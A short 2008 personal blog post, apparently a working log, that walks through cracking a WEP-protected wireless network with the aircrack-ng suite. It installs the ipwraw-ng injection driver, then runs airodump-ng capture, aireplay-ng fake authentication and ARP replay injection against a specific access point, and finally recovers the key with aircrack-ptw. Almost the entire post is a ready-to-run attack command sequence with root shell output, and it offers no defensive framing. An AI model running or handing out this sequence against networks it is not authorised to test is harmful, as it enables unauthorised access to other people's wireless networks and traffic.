Sunday, February 24, 2008

 

wifi security :-(

cracking....
Using http://aircrack-ng.org/doku.php?id=ipw3945
(it uses ipwraw-ng http://homepages.tu-darmstadt.de/~p_larbig/wlan/)

cd /home/jfclere/modem/wifi/ipwraw-ng
make
make install
make install_ucode

Remove old driver:
+++
[root@jfcpc ipwraw-ng]# /sbin/lsmod | grep 39
ipw3945 181024 0
ieee80211 30985 1 ipw3945
[root@jfcpc ipwraw-ng]# /sbin/rmmod ipw3945
[root@jfcpc ipwraw-ng]# /etc/rc.d/init.d/ipw3945d stop
Stopping ipw3945d: [ OK ]
+++
Load the new one:
+++
[root@jfcpc ipwraw-ng]# /sbin/modprobe ipwraw
+++
start it up:
+++
[root@jfcpc ipwraw-ng]# /sbin/ifconfig wifi0 up
[root@jfcpc ipwraw-ng]# /sbin/iwconfig wifi0 rate 1M
+++
set the right channel for example:
+++
[root@jfcpc ipwraw-ng]# /sbin/iwconfig wifi0 chan 1
+++

/sbin/iwconfig wifi0 works with it.
/sbin/iwconfig wifi0 rate 1M

kismet too.
edit /etc/kismet/kismet.conf add something:
source=ipw3945,wifi0,wifi0

start capture (to get the file.cap):
/usr/sbin/airodump-ng -c 11 --bssid 00:C0:49:F1:XX:XX -w XXXX rtap0


use test to check it will work:
/usr/sbin/aireplay-ng -9 wifi0 -b 00:C0:49:F1:XX:XX

use fakeauth (-1) to check the AP likes us:
/usr/sbin/aireplay-ng -1 0 -e XXXX -a 00:C0:49:F1:XX:XX -h
00:19:D2:AE:3B:9D wifi0

use -3 of aireplay-ng to inject (it takes times to get APR packets).
/usr/sbin/aireplay-ng -3 -b 00:C0:49:F1:XX:XX -h 00:19:D2:AE:3B:9D wifi0

the lastest step is:
aircrack-ptw file.cap
If it doesn't work try the slower:
aircrack-ng file.cap


Comments: Post a Comment



<< Home

This page is powered by Blogger. Isn't yours?